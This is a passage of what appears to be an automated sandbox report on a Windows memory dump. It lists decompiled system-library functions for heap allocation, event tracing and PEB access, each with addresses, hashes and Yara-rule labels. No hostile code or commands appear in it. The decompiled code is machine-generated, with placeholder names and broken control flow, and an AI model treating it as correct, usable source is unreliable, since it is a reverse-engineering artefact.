				_push( *_t29 & 0x000000ff);
				return E0469B640(E04699AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x04728ed6
0x04728ee5
0x04728eed
0x04728ef0
0x04728efa
0x04728f03
0x04728f0c
0x04728f15
0x04728f24
0x04728f27
0x04728f31
0x04728f43
0x04728f33
0x04728f3c
0x04728f3c
0x04728f4e
0x04728f4f
0x04728f51
0x04728f56
0x04728f69

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 021fbfc4f4e225294331266f54a6541722c20244e7e605e3fcde59d39e68d20a
Instruction ID: 9c0bf3a49015b9b6f078e71911e07bcb6fcade9298fbd6bf817e5c39c07d67b8
Opcode Fuzzy Hash: 021fbfc4f4e225294331266f54a6541722c20244e7e605e3fcde59d39e68d20a
Instruction Fuzzy Hash: C8111E70E002599FDB04DFA9D541BAEB7F4FF08700F0442AAE518EB381E634A940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0465DB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0465DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0465DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0465E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0465E8B0(__ecx, _t14, 0xfff);
							L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x0465db64
0x0465db66
0x0465db6b
0x0465dbaa
0x0465db71
0x0465db76
0x0465db7a
0x0465dba3
0x0465db7c
0x0465db87
0x0465db8b
0x046b4fa1
0x046b4fb3
0x046b4fb8
0x0465db91
0x0465db96
0x0465db98
0x0465db98
0x0465db8b
0x0465db7a
0x0465db9d
0x0465dba2

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 38cc18ad0bc2c376afa6a52df4dba32a223195ed89c8dbcdd97a2673ea07f3ba
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 70F04CB32005229FE7325F558880F17B6AB8FD1AA1F154039F9049B3A4FD60BC0397D4

Uniqueness

Uniqueness Score: -1.00%

Function 0465B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0465B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04677D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04677D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E046D7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x0465b1e8
0x0465b1ea
0x0465b1f3
0x046b4a17
0x0465b1f9
0x0465b1f9
0x0465b1f9
0x0465b201
0x046b4a21
0x046b4a2e
0x00000000
0x00000000
0x046b4a3b
0x046b4a4d
0x046b4a3d
0x046b4a46
0x046b4a46
0x046b4a55
0x00000000
0x00000000
0x00000000
0x0465b20a
0x0465b20a
0x0465b20a
0x0465b20a

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 713d4142a66a5c8d8062cf98cdb24f22027b1e6978eae3b47d7b9455981adc84
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: AC01F9323005849BD322975DD808FA97B98EF51754F084062FD548B7B2FA74F840C369

Uniqueness

Uniqueness Score: -1.00%

Function 046EFE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E046EFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x474d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E04677D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0469B640(E04699AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x046efe96
0x046efe9e
0x046efea1
0x046efead
0x046efeb3
0x046efeb9
0x046efec3
0x046efed5
0x046efec5
0x046efece
0x046efece
0x046efee0
0x046efee1
0x046efee3
0x046efee8
0x046efefb

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 612edc474beaf9688f77e99d30029b9dec4a36cf423bf76e510139d3a8ed999e
Instruction ID: 4b9a06485da3f9590085e50f403ef3845e4cb2c8e0cb1ca93b2ff4be2fbb9787
Opcode Fuzzy Hash: 612edc474beaf9688f77e99d30029b9dec4a36cf423bf76e510139d3a8ed999e
Instruction Fuzzy Hash: 1D014F70A00208AFCB14DFA8D541A6EB7F4EF04704F10415AA504EB382E635F901CB44

Uniqueness

Uniqueness Score: -1.00%

Function 04728F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E04728F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x474d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04677D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0469B640(E04699AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x04728f6a
0x04728f79
0x04728f81
0x04728f84
0x04728f8b
0x04728f91
0x04728f94
0x04728f9e
0x04728fb0
0x04728fa0
0x04728fa9
0x04728fa9
0x04728fbb
0x04728fbc
0x04728fbe
0x04728fc3
0x04728fd6

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59d58beafefa57471bfa244673ca8871b0445b88e1fb7b8ae4705b0baf7e827a
Instruction ID: 2e88787c9d5a61486f75b0fa7c1d7667a357bb22d4315fd12800bd9afe4335e9
Opcode Fuzzy Hash: 59d58beafefa57471bfa244673ca8871b0445b88e1fb7b8ae4705b0baf7e827a
Instruction Fuzzy Hash: 39013674A002089FDB00EFA8D545AAEB7F4FF48700F10405AB905EB340E674EA00CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0471131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0471131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x474d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04677D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0469B640(E04699AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0471131b
0x0471132a
0x04711330
0x04711336
0x0471133e
0x04711341
0x04711344
0x0471134f
0x04711361
0x04711351
0x0471135a
0x0471135a
0x0471136c
0x0471136d
0x0471136f
0x04711374
0x04711387

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdc8fb426abc9c2d54c006e8da51f683b78115877979ca8b41e21dcdec389d37
Instruction ID: 4ead73221de9494955df8d3a631a22c4ba3ccd9a1e660945d3e9095ce58f91c5
Opcode Fuzzy Hash: bdc8fb426abc9c2d54c006e8da51f683b78115877979ca8b41e21dcdec389d37
Instruction Fuzzy Hash: 32013C71A01208AFDB04EFA9D545AAEB7F4FF48700F40805AB945EB391E674AA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0467C577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0467C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0467C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x46311cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E047288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x0467c577
0x0467c57d
0x0467c581
0x0467c5b5
0x0467c5b9
0x0467c5ce
0x0467c5ce
0x0467c5ca
0x00000000
0x0467c5ca
0x0467c5c4
0x0467c5c8
0x00000000
0x00000000
0x00000000
0x0467c5ad
0x00000000
0x0467c5af

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab3268ef45f845d0e8a6c12ba0061987558217de240e706209ccecf3ac4e59ad
Instruction ID: bb6f0e3887181bddf64ff5f4db4c76b41f2eab630f9cfc0d029e774511744b99
Opcode Fuzzy Hash: ab3268ef45f845d0e8a6c12ba0061987558217de240e706209ccecf3ac4e59ad
Instruction Fuzzy Hash: E0F02EB2911AA0CFF732CF28C004B227BE89B25770F44896BD40683301F2A2FCA0C241

Uniqueness

Uniqueness Score: -1.00%

Function 04712073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04712073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0470FD22(__ecx);
				_t19 =  *0x474849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4748748; // 0x0
					if(__eflags <= 0) {
						E04711C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4748724 & 0x00000004;
							if(( *0x4748724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4748724; // 0x0
					return E04708DF1(__ebx, 0xc0000374, 0x4745890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x04712076
0x04712078
0x0471207d
0x04712083
0x047120a4
0x047120aa
0x047120ac
0x047120b7
0x047120ba
0x047120bc
0x047120c9
0x047120c9
0x047120d0
0x047120d2
0x00000000
0x047120d2
0x047120be
0x047120c3
0x047120c5
0x047120c7
0x00000000
0x00000000
0x047120c7
0x047120bc
0x047120d4
0x04712085
0x04712085
0x047120a3
0x047120a3

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61158ff89f43f10bc61ba1724b9341a7d7deb2617c97569c8e119f83d8b8f089
Instruction ID: 88102d25748e3ea92ad2a4a447927162aa05ccba3d919b03520cb9fe4a6d3084
Opcode Fuzzy Hash: 61158ff89f43f10bc61ba1724b9341a7d7deb2617c97569c8e119f83d8b8f089
Instruction Fuzzy Hash: 31F0A76E41618C8AEF327F6D65152F13BD4D785114B1B49C6D55027316C638EC83CA61

Uniqueness

Uniqueness Score: -1.00%

Function 04728D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E04728D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x474d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04677D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0469B640(E04699AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x04728d34
0x04728d43
0x04728d4b
0x04728d4e
0x04728d52
0x04728d5c
0x04728d6e
0x04728d5e
0x04728d67
0x04728d67
0x04728d79
0x04728d7a
0x04728d7c
0x04728d81
0x04728d94

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f15b796661ebc411290fdad0706bc0767e53c431037b669822eb45d8dcefff8a
Instruction ID: b393408566c1486a666ccc7919a3fffea6d2ecfd93e771e77f60db58a75ebb68
Opcode Fuzzy Hash: f15b796661ebc411290fdad0706bc0767e53c431037b669822eb45d8dcefff8a
Instruction Fuzzy Hash: FDF09070A046189FDB14EBB8E541A6E77B8EB08700F10809AE905AB380EA34F9048758

Uniqueness

Uniqueness Score: -1.00%

Function 0469927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0469927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0469FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E046992C6(_t11, _t14);
				}
				return _t11;
			}

0x04699295
0x04699299
0x0469929f
0x046992aa
0x046992ad
0x046992ae
0x046992af
0x046992b0
0x046992b4
0x046992bb
0x046992bb
0x046992c5

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: fd44c4ce762fdc6d4b918b324cd196efe8b1c8e22bddf22cedef4fb2fa86ac3c
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: A1E0E5723405006BEB159E09CC84B03369D9F82724F00407CB5005E242DAE5EC0887A4

Uniqueness

Uniqueness Score: -1.00%

Function 0467746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0467746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0466EB70(__ecx, 0x47479a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E046995D0();
							L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x0467746d
0x0467746d
0x0467746d
0x04677471
0x04677488
0x046bf92d
0x0467748e
0x04677491
0x04677495
0x046bf937
0x046bf93a
0x046bf94e
0x046bf953
0x046bf956
0x046bf956
0x04677495
0x00000000
0x04677488
0x04677473
0x04677478
0x0467747d
0x04677481
0x00000000
0x04677481
0x0467747d
0x0467747a
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f25e5d4c70b8b0e7efa624838471a43d40c008c1f5dbd6431e45c1f1e1a9e52e
Instruction ID: 3818e4407853fcfb0ba772b7ee12a84ef74c449686fc4484bfa4256d89bc37d7
Opcode Fuzzy Hash: f25e5d4c70b8b0e7efa624838471a43d40c008c1f5dbd6431e45c1f1e1a9e52e
Instruction Fuzzy Hash: 13F0E935680344ABDF159B68C840B797FB1AF1431AF040519D491A7264F765FC02CBC9

Uniqueness

Uniqueness Score: -1.00%

Function 04728CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04728CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x474d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04677D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0469B640(E04699AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04728ce5
0x04728ced
0x04728cf0
0x04728cfb
0x04728d0d
0x04728cfd
0x04728d06
0x04728d06
0x04728d18
0x04728d19
0x04728d1b
0x04728d20
0x04728d33

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b584b271da3b88af03a5d68e218f14179628d40f3175765e21062236cf355c8f
Instruction ID: 28d38a6cac33c1858dba0fdf346bd7fb6cca21ece53f423e301051a9fcb60abc
Opcode Fuzzy Hash: b584b271da3b88af03a5d68e218f14179628d40f3175765e21062236cf355c8f
Instruction Fuzzy Hash: F0F08270A04218ABDB04EBB9E945EAE77B8EF48704F11419EE915EB380FA35FD04C759

Uniqueness

Uniqueness Score: -1.00%

Function 04728B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04728B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x474d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04677D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0469B640(E04699AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04728b67
0x04728b6f
0x04728b72
0x04728b7d
0x04728b8f
0x04728b7f
0x04728b88
0x04728b88
0x04728b9a
0x04728b9b
0x04728b9d
0x04728ba2
0x04728bb5

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64d1ff8e0dacf7a269868d45769a5ee3e27bdb442d85f2b0cb46e21cba511d26
Instruction ID: bbdb80544280788a0521a8fb0523534a7e7c949128b8052a4a0d176f79f6567a
Opcode Fuzzy Hash: 64d1ff8e0dacf7a269868d45769a5ee3e27bdb442d85f2b0cb46e21cba511d26
Instruction Fuzzy Hash: BBF05EB0A04258ABEB10EBA8EA06A7E73A8EB04704F05455DA9059B380FA74F900C799

Uniqueness

Uniqueness Score: -1.00%

Function 04654F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04654F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E047288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0467C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4631030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x04654f2e
0x04654f34
0x04654f38
0x046b0b85
0x046b0b85
0x046b0b89
0x046b0b9a
0x046b0b9a
0x046b0b9f
0x00000000
0x046b0b9f
0x046b0b94
0x046b0b98
0x00000000
0x00000000
0x00000000
0x046b0b98
0x04654f3e
0x04654f48
0x00000000
0x04654f6e
0x00000000
0x04654f70

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 908af529564449af78c6d42bdec6ecd9619763ecb59ee01e371fc38770c57e48
Instruction ID: e660b46cdeb565a52cde1662222569308914132ef1958e65de47747af31e2097
Opcode Fuzzy Hash: 908af529564449af78c6d42bdec6ecd9619763ecb59ee01e371fc38770c57e48
Instruction Fuzzy Hash: 59F09A325257958FE7619B18C284FA3BBD4AB207B8F4544A4D48587A21FB25F880C780

Uniqueness

Uniqueness Score: -1.00%

Function 0468A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0468A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x4747b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0469FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0468a44b
0x0468a453
0x0468a472
0x0468a476
0x00000000
0x0468a493
0x0468a47a
0x0468a47f
0x0468a486
0x00000000

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac33877cda98b42999dc5b6b03673242e67892946ef9cd2668b70e145acbd872
Instruction ID: 262370135297ef40bf499c7521b25f615c826ef68c5cd9ae4770345907632a0a
Opcode Fuzzy Hash: ac33877cda98b42999dc5b6b03673242e67892946ef9cd2668b70e145acbd872
Instruction Fuzzy Hash: CBE092B2B01421ABD612AA58AD00F66739DDBE5655F0A413AF904C7224EA68ED02C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 0465F358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0465F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0468F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04674620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x0465f35d
0x0465f361
0x0465f367
0x0465f372
0x0465f38c
0x0465f38c
0x0465f394

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: bda26fc509807eb42c4f1806fa37ddb036fb6f143bec966d3c232128d604a7c4
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
